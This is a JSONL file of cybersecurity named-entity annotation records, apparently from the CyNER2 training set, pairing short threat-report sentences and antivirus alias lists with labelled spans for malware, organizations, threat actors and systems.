{"text": "A backdoor also known as: Virus/W32.Induc Virus.Induc.Win32.1 W32.W.Deecee.lrKT Trojan.Induc.1 Win32.Virus.Induc.a W32/Trojan2.GROR W32.Induc.A Win32/Nedsym.C PE_INDUC.A Win.Virus.Induc-2 Virus.Win32.Induc.b Virus.Win32.Induc.dffkeg Win32.Induc.A Virus.Win32.Induc.A0 Win32.Induc PE_INDUC.A Trojan-Spy.Win32.Banker W32/Trojan.QGYF-1386 Win32/Induc.a W32/Induc.blr Trojan[Spy]/Win32.KeyLogger Win32.Induc.b.820224 Trojan:Win32/Nedsym.F Virus.Win32.Induc.b TrojanSpy.Delf Virus.Win32.Indcu.A.200014 Win32.Induc Virus.Win32.Induc.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000923", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Geral!O Trojan.KillAV.Win32.4515 Trojan/KillAV.nka Trojan.Dropper.18 Trojan.KillAV Win32/Tnega.AANE Trojan.Win32.Drop.csaym Trojan.Win32.A.Downloader.44432[UPX] TrojWare.Win32.TrojanDownloader.Geral.djfl Trojan.MulDrop2.15 BehavesLike.Win32.Backdoor.pc Trojan.Win32.Claretore Trojan/Win32.Unknown Trojan:Win32/Bodime.C Win-Trojan/Inject.43892 Trojan.KillAV!AN0QbvE+MIE Win32/Trojan.BO.785", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000924", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.YRTS-5407 Trojan.MSIL.Androm.3 HackTool:MSIL/Boilod.C!bit Trojan/Win32.Boilod.C2311288", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000926", "source": "cyner2_train"}}
{"text": "The Trojan's technical details and the vectors of its propagation were recently described in the blog by Unit42.", "spans": {"MALWARE: Trojan's": [[4, 12]], "ORGANIZATION: Unit42.": [[105, 112]]}, "info": {"id": "cyner2_train_000927", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanAPT.LecnaCShip.MUE.Z4 Win32.Trojan.WisdomEyes.16070401.9500.9955 Infostealer.Spasip Trojan.Win32.ShipUp.bbuken Trojan.MulDrop4.6955 Trojan/ShipUp.hh TR/Drop.ShipUp.vauvq Worm:Win32/Shup.A Trojan/Win32.ShipUp.R191080 Trj/CI.A W32/Lecna.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000928", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RiskWare.SecurityXploded W32/Trojan.BXPP-2784 Win32.Riskware.Passdump.A Trojan.Win32.Stealer.dbmdyq Trojan.PWS.Stealer.13033 RiskWare[PSWTool]/Win32.PasswordCracker Unwanted/Win32.HackTool.R117574 not-a-virus:PSWTool.PasswordCracker HackTool.Samples Win32/Virus.PSW.c09", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000931", "source": "cyner2_train"}}
{"text": "The domain was hosted by an IP address assigned to ito.gov[.]ir - The Iranian Ministry of Communication and Information Technology.", "spans": {"ORGANIZATION: The Iranian Ministry of Communication and Information Technology.": [[66, 131]]}, "info": {"id": "cyner2_train_000936", "source": "cyner2_train"}}
{"text": "Since at least November 2018, ITG03 actors have stolen money from ATMs in Asia and Africa, according to U.S. Government sources and Symantec.", "spans": {"THREAT_ACTOR: ITG03 actors": [[30, 42]], "SYSTEM: ATMs": [[66, 70]], "ORGANIZATION: U.S. Government sources": [[104, 127]], "ORGANIZATION: Symantec.": [[132, 141]]}, "info": {"id": "cyner2_train_000938", "source": "cyner2_train"}}
{"text": "DDE traditionally allows for the sending of messages between applications that share data, for example from Word to Excel or vice versa.", "spans": {"SYSTEM: DDE": [[0, 3]], "SYSTEM: Word": [[108, 112]], "SYSTEM: Excel": [[116, 121]]}, "info": {"id": "cyner2_train_000939", "source": "cyner2_train"}}
{"text": "Over the past few months, we've been following a new type of worm we named PhotoMiner.", "spans": {"MALWARE: worm": [[61, 65]], "MALWARE: PhotoMiner.": [[75, 86]]}, "info": {"id": "cyner2_train_000943", "source": "cyner2_train"}}
{"text": "Researchers at Lumen Black Lotus Labs have identified a never-before-seen campaign involving compromised routers.", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "ORGANIZATION: Lumen Black Lotus Labs": [[15, 37]], "THREAT_ACTOR: campaign": [[74, 82]], "SYSTEM: compromised routers.": [[93, 113]]}, "info": {"id": "cyner2_train_000947", "source": "cyner2_train"}}
{"text": "It infects business-grade routers and deploys two malicious binaries, including a Remote Access Trojan RAT called HiatusRAT, and a variant of tcpdump that enables packet capture on the target device.", "spans": {"SYSTEM: routers": [[26, 33]], "MALWARE: a Remote Access Trojan RAT": [[80, 106]], "MALWARE: HiatusRAT,": [[114, 124]], "SYSTEM: target device.": [[185, 199]]}, "info": {"id": "cyner2_train_000948", "source": "cyner2_train"}}
{"text": "Once the device is compromised, a process of sophisticated intelligence gathering starts, exploiting the ability to access the phone's video and audio capabilities, SMS functions, and location.", "spans": {"SYSTEM: device": [[9, 15]], "VULNERABILITY: exploiting": [[90, 100]]}, "info": {"id": "cyner2_train_000949", "source": "cyner2_train"}}
{"text": "Zscaler's cloud sandboxes recently detected a Remote Access Trojan RAT being delivered by a well-known Chinese cyber espionage group using the Hacking Team's 0-day exploits.", "spans": {"ORGANIZATION: Zscaler's cloud": [[0, 15]], "SYSTEM: sandboxes": [[16, 25]], "THREAT_ACTOR: Remote Access Trojan RAT": [[46, 70]], "THREAT_ACTOR: Chinese cyber espionage": [[103, 126]], "ORGANIZATION: Hacking": [[143, 150]], "ORGANIZATION: Team's": [[151, 157]], "MALWARE: 0-day exploits.": [[158, 173]]}, "info": {"id": "cyner2_train_000951", "source": "cyner2_train"}}
{"text": "Most of the IP addresses belong to known bulletproof hosting networks that advertise their services on different forums.", "spans": {"ORGANIZATION: bulletproof hosting networks": [[41, 69]]}, "info": {"id": "cyner2_train_000953", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Startpage.MP3 W32/Trojan2.NCFX Downloader.BBNK Win32/SillyDl.WLY Trojan.Downloader-96481 Trojan.Win32.A.Downloader.274432.H Trojan.DownLoad2.14890 TROJ_DLOAD.SMCV Heuristic.BehavesLike.Win32.AdSpyware.H TrojanDownloader:Win32/Sysfade.B W32/Trojan.QIXU-7273 HeurEngine.MaliciousPacker Win32/StartPage.NVY Trojan.Win32.Fednu.amu Trojan.Win32.StartPage Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000955", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLTSHWDN.Trojan Trojan.Azberg.B Trojan.Skeeyah Dropper.FrauDrop.Win32.3255 Backdoor.W32.Azbreg.miLK TSPY_AZBREG_BL132B01.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Dropper TSPY_AZBREG_BL132B01.TOMC Win.Trojan.Azberg-1 Trojan.Azberg.B Trojan-Downloader.Win32.Bandit.ey Trojan.Azberg.B Trojan.Win32.Azbreg.dtleix Trojan.Win32.Z.Azbreg.209435 Trojan.Azberg.B W32/Trojan.QMPY-2353 Win32.Hack.Azbreg.a.kcloud Trojan.Azberg.B Trojan-Downloader.Win32.Bandit.ey Trojan:Win32/HistBoader.A Backdoor/Win32.Azbreg.R29412 Trojan.Azberg.B Trj/CI.A Win32.Trojan-downloader.Bandit.Sxef Backdoor.Azbreg!vdtQoRBMLTw Trojan.Crypt Win32/Trojan.Dropper.e71", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000956", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9983 Trojan.Heriplor Trj/CI.A Trojan.Rogue!T/cJXL8TDNE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000957", "source": "cyner2_train"}}
{"text": "It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.", "spans": {"ORGANIZATION: organizations": [[40, 53]], "ORGANIZATION: industries": [[66, 76]]}, "info": {"id": "cyner2_train_000958", "source": "cyner2_train"}}
{"text": "For years now, criminals behind banking Trojans, remote access tools RATs and other types of malware have targeted Microsoft Windows hosts in Brazil through malicious spam malspam.", "spans": {"THREAT_ACTOR: criminals": [[15, 24]], "MALWARE: banking Trojans, remote access tools RATs": [[32, 73]], "MALWARE: malware": [[93, 100]], "SYSTEM: Microsoft Windows hosts": [[115, 138]]}, "info": {"id": "cyner2_train_000959", "source": "cyner2_train"}}
{"text": "Palo Alto Networks researchers recently discovered a family of malware, designated ProxyBack, and observed over 20 versions that have been used to infect systems as far back as March 2014.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: family of malware,": [[53, 71]], "MALWARE: ProxyBack,": [[83, 93]], "MALWARE: 20 versions": [[112, 123]], "SYSTEM: systems": [[154, 161]]}, "info": {"id": "cyner2_train_000963", "source": "cyner2_train"}}
{"text": "The malicious ads would automatically no click required redirect users to a casino website used as decoy to silently load malicious iframes from disposable domains which ultimately lead to the Angler exploit kit.", "spans": {"MALWARE: Angler exploit kit.": [[193, 212]]}, "info": {"id": "cyner2_train_000964", "source": "cyner2_train"}}
{"text": "Typically, other exploit kits make an effort to hide their exploits.", "spans": {"MALWARE: exploit kits": [[17, 29]], "MALWARE: exploits.": [[59, 68]]}, "info": {"id": "cyner2_train_000965", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Badoor.2.0 Backdoor.Win32.Zemac!O Backdoor.Badoor.2.0 W32/VBTrojan.19G!Maximus BKDR_ZEMAC.B Win.Trojan.Zemac-1 Backdoor.Win32.Zemac.b Backdoor.Badoor.2.0 Trojan.Win32.Zemac.fypm Backdoor.Badoor.2.0 TrojWare.Win32.BackDoor.2_0 Backdoor.Badoor.2.0 BackDoor.Zemac.200 BKDR_ZEMAC.B W32/VBTrojan.19G!Maximus Backdoor/Zemac.b TR/Zemac.B Trojan[Backdoor]/Win32.Zemac Backdoor:Win32/Zemac.B Backdoor.Win32.Zemac.b Backdoor.Badoor.2.0 Backdoor.Badoor.2.0 Backdoor.Zemac Win32/BackDoor.2_0 W32/Bdoor.AR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000966", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Flooder.Intelirc.1.5 Trojan.Flooder.Intelirc.1.5 Trojan.Flooder.Intelirc.1.5 Trojan.Flooder.Intelirc.1.5 Flooder.Win32.IntelIRC.15 Trojan.Flooder.Intelirc.1.5 Trojan.Win32.IntelIRC.dicf Flooder.W32.IntelIRC.15!c Trojan.Flooder.Intelirc.1.5 TrojWare.Win32.Flooder.IntelIRC.15 Trojan.Flooder.Intelirc.1.5 BackDoor.Spieluhr Tool.IntelIRC.Win32.1 Flooder.IntelIRC.b HackTool[Flooder]/Win32.IntelIRC Flooder.Win32.IntelIRC.15 Flooder.IntelIRC Win32/Flooder.IntelIRC.15 Trojan.Win32.Flooder Malware_fam.gw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000967", "source": "cyner2_train"}}
{"text": "Talos continuously monitors malicious emails campaigns.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: malicious emails campaigns.": [[28, 55]]}, "info": {"id": "cyner2_train_000970", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Slackbot.8329 Backdoor.Win32.Slackbot!O Backdoor/Slackbot.b TROJ_DLDER.A Win32.Trojan.WisdomEyes.16070401.9500.9979 W32/Slackbot.B Backdoor.Slackbot.10 Win32/Slack.10 TROJ_DLDER.A Win.Trojan.Slackbot-1 Backdoor.Win32.Slackbot.b Trojan.Win32.Slackbot.bmpwl Backdoor.Win32.Slackbot.7712 Virus.Malware.Sidldg!c Backdoor.Win32.Slackbot.B BackDoor.IRC.Sdbot.13459 Backdoor.Slackbot.Win32.28 BehavesLike.Win32.Downloader.xh Backdoor.Win32.Slackbot W32/Slackbot.TGFH-5934 Trojan/PSW.Magania.imu BDS/SlackBot.B1 Trojan[Backdoor]/Win32.Slackbot Backdoor:Win32/Slackbot.D Backdoor.Slackbot Backdoor.Win32.Slackbot.b Win-Trojan/Slackbot.8329 Backdoor.Slackbot Bck/Slackbot.Be Win32/Slackbot.B Trojan.Slackbot.B W32/Slackbot.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000971", "source": "cyner2_train"}}
{"text": "A few months ago, we covered the ChessMaster cyberespionage campaign, which leveraged a variety of toolsets and malware such as ChChes and remote access trojans like RedLeaves and PlugX to compromise its targets—primarily organizations in Japan.", "spans": {"THREAT_ACTOR: the ChessMaster cyberespionage campaign,": [[29, 69]], "MALWARE: toolsets": [[99, 107]], "MALWARE: malware": [[112, 119]], "MALWARE: ChChes": [[128, 134]], "MALWARE: remote access trojans": [[139, 160]], "MALWARE: RedLeaves": [[166, 175]], "MALWARE: PlugX": [[180, 185]], "ORGANIZATION: organizations": [[222, 235]]}, "info": {"id": "cyner2_train_000974", "source": "cyner2_train"}}
{"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the “ screencap ” command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger .", "spans": {"MALWARE: RCSAndroid": [[31, 41]], "SYSTEM: Skype": [[288, 293], [612, 617]], "SYSTEM: Facebook": [[296, 304]], "SYSTEM: Twitter": [[307, 314]], "SYSTEM: Google": [[317, 323]], "SYSTEM: WhatsApp": [[326, 334], [601, 609]], "SYSTEM: Mail": [[337, 341]], "SYSTEM: LinkedIn": [[348, 356]], "SYSTEM: Gmail": [[409, 414]], "SYSTEM: Facebook Messenger": [[580, 598]], "SYSTEM: Viber": [[620, 625]], "SYSTEM: Line": [[628, 632]], "SYSTEM: WeChat": [[635, 641]], "SYSTEM: Hangouts": [[644, 652]], "SYSTEM: Telegram": [[655, 663]], "SYSTEM: BlackBerry Messenger": [[670, 690]]}, "info": {"id": "cyner2_train_000975", "source": "cyner2_train"}}
{"text": "As part of this breach, the media organization's website was being leveraged as a component of a malware campaign targeting select visitors.", "spans": {"THREAT_ACTOR: malware campaign": [[97, 113]], "ORGANIZATION: visitors.": [[131, 140]]}, "info": {"id": "cyner2_train_000978", "source": "cyner2_train"}}
{"text": "The buyer can then choose to host/spread/distribute it in whatever way they see fit - as opposed to some of the more recent turn-key offerings like Ransom32, ORX-Locker, or Encryptor RAAS, which lack a full administrative panel and other customization features present in a fully packaged malware kit'.", "spans": {"THREAT_ACTOR: buyer": [[4, 9]], "MALWARE: Ransom32, ORX-Locker,": [[148, 169]], "MALWARE: Encryptor RAAS,": [[173, 188]], "MALWARE: malware kit'.": [[289, 302]]}, "info": {"id": "cyner2_train_000979", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.HLLP.Delf.B Worm.Niklas RiskWare.Tool.CK Win32.HLLP.Delf.B Win32.Trojan.WisdomEyes.16070401.9500.9630 W32.HLLW.Niklas Win32.HLLP.Delf.B Virus.Win32.HLLP.Delf.b Win32.HLLP.Delf.B Trojan.Win32.Niklas.hekr Trojan.Dropper/Packed Win32.HLLP.Delf.B TrojWare.Win32.Patched.KSU Win32.HLLP.Delf.B Win32.HLLW.Atmetka Virus.Delf.Win32.30 BehavesLike.Win32.Downloader.lc Worm:Win32/Niklas.C W32/Hllp.Delf.E Worm:Win32/Niklas.C W32.HLLP.Delf.b!c Virus.Win32.HLLP.Delf.b Trojan/Win32.Xema.C36267 Win32.HLLP.Delf.B Win32.Virus.Hllp.Dztg HLLP.Delf.SV1 Trojan-PWS.Win32.Lmir.awg W32/HLLP.DELF.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000980", "source": "cyner2_train"}}
{"text": "Websense Security Labs researchers have been monitoring a mass scale malvertising campaign that leads to Angler Exploit Kit.", "spans": {"ORGANIZATION: Websense Security Labs": [[0, 22]], "THREAT_ACTOR: malvertising": [[69, 81]], "THREAT_ACTOR: campaign": [[82, 90]], "MALWARE: Angler Exploit Kit.": [[105, 124]]}, "info": {"id": "cyner2_train_000982", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Win32.Worm.Autorun.VN Virus.Win32.Virut.1!O W32.Virut.G Win32.Worm.Autorun.VN W32.W.Bnf.tnnw Win32.Worm.Autorun.VN W32.SillyFDC Win32/Virut.17408 WORM_OTORUN.SMXY Win.Trojan.VB-73727 Worm.Win32.AutoRun.hfp Win32.Worm.Autorun.VN Trojan.Win32.Autoruner1.csgwlt Worm.Win32.Autorun.afe Win32.Worm.Autorun.VN Virus.Win32.Virut.CE Win32.Worm.Autorun.VN Win32.Virut.56 WORM_OTORUN.SMXY BehavesLike.Win32.Gupboot.ht Worm.Win32.AutoRun Win32/Virut.bv WORM/Autorun.hfp Trojan/Win32.Unknown Worm:Win32/Wecykler.A Worm.Win32.AutoRun.364544.A Worm.Win32.AutoRun.hfp HEUR/Fakon.mwf W32/Autorun.worm.aaav Worm.AutoRun.Silly Backdoor.Bot Worm.AutoRun!iW63fF1TdWk W32/AutoRun.GP!worm W32/Sality.AO Worm.Win32.FakeFolder.BY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000983", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameXLIIUAAR.Trojan Backdoor.Win32.Xtobox!O Backdoor/Xtob.m Win32.Trojan.WisdomEyes.16070401.9500.9787 W32/Risk.CVOB-2286 Win32/Tnega.AKCE Win.Trojan.Xtob-2 Backdoor.Win32.Xtob.m Trojan.Win32.Scar.bqzdl Backdoor.Win32.A.Xtob.118784[UPX] Backdoor.W32.Xtob!c BackDoor.Piroxcc TSPY_YAHOS_CD1000EC.RDXN BehavesLike.Win32.Dropper.dz Trojan.Win32.Scar W32/MalwareS.BFOO Trojan/Cosmu.drs Trojan[Backdoor]/Win32.Xtob Backdoor.Win32.Xtob.m Trojan:Win32/Scar.V Trojan/Win32.Scar.C104448 Backdoor.Xtob Win32.Backdoor.Xtob.Dyzl Trojan.Scar!bp+jOb+ovfY Win32/Backdoor.f23", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000985", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.VB!O Trojan.VB Trojan.Infidesgate Win32/Adslock.A Trojan-Ransom.Win32.VB.du Troj.Ransom.W32!c Trojan.DownLoader4.48837 BehavesLike.Win32.Trojan.nz Trojan-Ransom.Win32.VB Trojan[Ransom]/Win32.VB Ransom:Win32/Adslock.A Trojan-Ransom.Win32.VB.du Trojan/Win32.HDC.C94839 Win32.Trojan.Vb.Piah Trojan.ATRAPS!J/1Dm4j1sNA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000986", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropper.Sysn.Win32.882 Trojan.Win32.Spammer.dchmhr Trojan-Dropper.Win32.Sysn.ailj Trojan.DR.Sysn! Trojan.Spambot.12672 TR/Dynamer.ac.1747 Trojan[Dropper]/Win32.Sysn Win32.Troj.Sysn.ai.kcloud W32/Sysn.AILJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000990", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.36864.BLO Win32.Trojan.WisdomEyes.16070401.9500.9887 Trojan.Win32.Small.vptjr Backdoor.Win32.Huigezi.oba BackDoor.IRC.NgrBot.189 Trojan.Zusy.D3B9D Trojan:Win32/Gutosver.A Trojan/Win32.Scar.R90823 TScope.Malware-Cryptor.SB W32/Small.NHC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000991", "source": "cyner2_train"}}
{"text": "In this post we describe the technical details about a newly observed campaign of the notorious Crypt0l0cker aka TorrentLocker or Teerac ransomware.", "spans": {"THREAT_ACTOR: campaign": [[70, 78]], "MALWARE: Crypt0l0cker": [[96, 108]], "MALWARE: TorrentLocker": [[113, 126]], "MALWARE: Teerac ransomware.": [[130, 148]]}, "info": {"id": "cyner2_train_000992", "source": "cyner2_train"}}
{"text": "Most online ads are displayed as a result of a chain of trust, from the publishers to the malicious advertiser via ad agencies and/or ad networks.", "spans": {}, "info": {"id": "cyner2_train_000993", "source": "cyner2_train"}}
{"text": "The Android version was a hit from the get-go, and it was one of 2014 s most active Android threats, being detected in multiple campaigns during that year [1, 2, 3], including one that leveraged an SMS worm to automate and boost its infection process.", "spans": {"SYSTEM: Android": [[4, 11], [84, 91]], "THREAT_ACTOR: multiple campaigns": [[119, 137]]}, "info": {"id": "cyner2_train_000994", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.Spy.W32.Zbot.touj Trojan.Razy.D164A7 Win32.Trojan.WisdomEyes.16070401.9500.9649 Trojan.Win32.Zbot.eljrsb Trojan.Win32.Zbot.44544.AI Trojan.DownLoader22.26316 TrojanSpy.Zbot.fgio Trojan[Spy]/Win32.Zbot TrojanDownloader:Win32/Smordess.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000995", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodceb.Trojan.2ec7 Trojan.Downloader.Delf.ER Trojan.Downloader.Delf.ER Downloader.Delf.Win32.5663 Trojan/Downloader.Delf.er Trojan.DL.Delf!VxwiJYoF8rw W32/Downloader.VRCK-6872 Trojan-Downloader.Win32.Delf.er Trojan.Downloader.Delf.ER Trojan.Win32.Delf.gudt Trojan.Win32.Downloader.17920.FB Trojan.Downloader.Delf.ER Trojan.Downloader.Delf.ER BehavesLike.Win32.PWSOnlineGames.lh W32/Downldr2.CMGJ TrojanDownloader.Dfg.a Trojan/Win32.Oirec Win32.Troj.Delf.er.kcloud PWS:Win32/Hacksoft.E Trojan.Downloader.Delf.ER Win-Trojan/Xema.variant TrojanDownloader.Delf Win32/TrojanDownloader.Delf.ER Win32.Trojan-downloader.Delf.Akoy Trojan-PWS.Win32.QQPass W32/DelpDldr.F!tr Downloader.Delf.4.BS Trojan.Win32.Delf.AVva", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000998", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Gedza.c Trojan.Symmi.D54D9 Win32.Trojan.WisdomEyes.16070401.9500.9785 W32/P2P_Worm.TWVI-7072 W32.SillyP2P Win.Trojan.Aitselom-1 P2P-Worm.Win32.Gedza.c Trojan.Win32.Gedza.empl W32.W.Gedza.c!c Worm.Win32.Gedza.C Win32.HLLW.Aitselom Worm.Gedza.Win32.3 Worm.Win32.Gedza W32/P2PWorm.GQ Worm/Gedza.c Worm:Win32/Gedza.C WORM/Gedza.C.1 Worm[P2P]/Win32.Gedza Worm.Gedza.c.kcloud Worm:Win32/Gedza.C P2P-Worm.Win32.Gedza.c TScope.Trojan.Delf W32/Gedza.F.worm Win32/Gedza.C Worm.P2P.Gedza!r6gvDWKTb4U W32/Delf.NHN!tr Win32/Worm.a05", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000999", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Kangaroo Win32.Trojan.WisdomEyes.16070401.9500.9872 Trojan.Randsom.A Ransom_Apocalypse.R039C0DAT18 Win32.Trojan-Ransom.Apocalypse.D Trojan-Ransom.Win32.Kangar.a Trojan.Win32.Filecoder.epdfna Trojan.Encoder.5883 Ransom_Apocalypse.R039C0DAT18 BehavesLike.Win32.Worm.lt W32/Trojan.ATNA-2545 Ransom:Win32/Apocalypse.A!bit Trojan-Ransom.Win32.Kangar.a Trojan/Win32.Kangaroo.R194907 Trj/GdSda.A Trojan.Mikey.D127AA Win32/Filecoder.NIC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001001", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.AceDeciever.15 Trojan:Win32/AceDeceiver.A Trojan.Win32.Acedeceiver", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001002", "source": "cyner2_train"}}
{"text": "The last time I saw proshuto8.exe it was Trickbot, but these malware gangs do mix match and reuse file names and delivery methods to deliver multiple different malwares.", "spans": {"MALWARE: Trickbot,": [[41, 50]], "THREAT_ACTOR: malware gangs": [[61, 74]], "MALWARE: malwares.": [[160, 169]]}, "info": {"id": "cyner2_train_001003", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PE:Malware.XPACK/RDM!5.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001005", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Dropper.ALXP Trojan.Dropper Trojan.Dropper-23429 Trojan-Dropper.Win32.Injector.hrpm Exploit.Servu!8cjzV0go40I Trojan.MulDrop.30820 Muster.c W32/Risk.XPXS-2512 TR/Expl.Servu.AK Trojan/Win32.Sasfis TrojanDropper:Win32/Apptom.B Virus.Win32.Part.a BScope.Trojan.Win32.Inject.2 Exploit.Win32.Servu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001006", "source": "cyner2_train"}}
{"text": "The overwriting of the data files will make it extremley difficult and costly, if not impossible, to recover the data using standard forensic methods.", "spans": {}, "info": {"id": "cyner2_train_001011", "source": "cyner2_train"}}
{"text": "Android.Bankosy is a Trojan horse for Android devices that steals information from the compromised device.", "spans": {"MALWARE: Trojan horse for": [[21, 37]], "SYSTEM: Android devices": [[38, 53]], "SYSTEM: compromised device.": [[87, 106]]}, "info": {"id": "cyner2_train_001012", "source": "cyner2_train"}}
{"text": "Series of attacks mostly against Israel-based organisations.", "spans": {"ORGANIZATION: Israel-based organisations.": [[33, 60]]}, "info": {"id": "cyner2_train_001013", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnlineGameGLISC.Trojan W32/Mydoom.cf.dll WORM_MYDOOM.EA W32/Downloader.EZUZ-6892 Trojan.Dozer Win32/Mydoom.BS WORM_MYDOOM.EA Win.Downloader.73527-1 DDoS.Config.6 W32/Mydoom.cf.dll Trojan.Win32.Lyzapo W32/Downldr2.FZUB W32.Trojan.Worm-myDoom Trojan:Win32/Lyzapo.A Trojan/Win32.DDoS.R528 W32/MyDoom.HN.worm Win32/Lyzapo.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001019", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Win32.Theefdl Trojan-Downloader.Win32!O Trojandownloader.Theefdl Downloader.Theefdl.Win32.5 TrojanDownloader.Win32.Theefdl W32/Theef.G@bd Downloader.Trojan Win32/TrojanDownloader.Theefdl TROJ_THEEFDL.A TrojanDownloader.Win32.Theefdl Trojan-Downloader.Win32.Theefdl TrojanDownloader.Win32.Theefdl Trojan.Win32.Theefdl.fydt Trojan.Win32.A.Downloader.81920.VZ TrojanDownloader.Win32.Theefdl TrojWare.Win32.TrojanDownloader.Theefdl Trojan.Thedl BehavesLike.Win32.Backdoor.mh Trojan-Downloader.Win32.Theefdl W32/Theef.TVQD-5666 TrojanDownloader.Theefdl Trojan[Downloader]/Win32.Theefdl TrojanDownloader:Win32/Theefdl.1_0 Trojan/Win32.Downloader.R94200 Trojan-Downloader.Win32.Theefdl TrojanDownloader.Win32.Theefdl TrojanDownloader.Theefdl Trojan.DL.Theefdl!lWNJHAF8U1M W32/Theefdl.G!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001020", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NSAnti.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Riskware.NoobyProtect.B Trojan.Win32.NobodyProtect.eviakq TrojWare.Win32.Amtar.KNB Trojan.DownLoader4.12788 BehavesLike.Win32.Pate.tc Trojan:Win32/Gee.B Dropper/Win32.PcClient.R6061 Trojan.Cryptic", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001022", "source": "cyner2_train"}}
{"text": "At the same time, in previous update activities, due to the setting of a specific named planned task, the researchers named it Blue Tea Action based on the name and Operation Black Ball 。", "spans": {"ORGANIZATION: the researchers": [[102, 117]], "MALWARE: Blue Tea Action": [[127, 142]], "THREAT_ACTOR: Operation Black Ball": [[165, 185]]}, "info": {"id": "cyner2_train_001023", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SunimodG.Trojan Worm.Win32.Juched!O WORM_GANELP.SMIA W32.Griptolo WORM_GANELP.SMIA Win.Worm.Autorun-9195 Worm.Win32.Juched.209429 Worm.Win32.Jushed.KA Trojan.Proxy.20270 Trojan.Win32.Webprefix W32.Worm.Ganelp Worm/Win32.Juched Worm.Juched.d.kcloud Worm:Win32/Ganelp.E Trojan/Win32.Npkon.R18258 Worm.Juched Trojan.FakeJava Trojan.Win32.FakeFolder.bba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001024", "source": "cyner2_train"}}
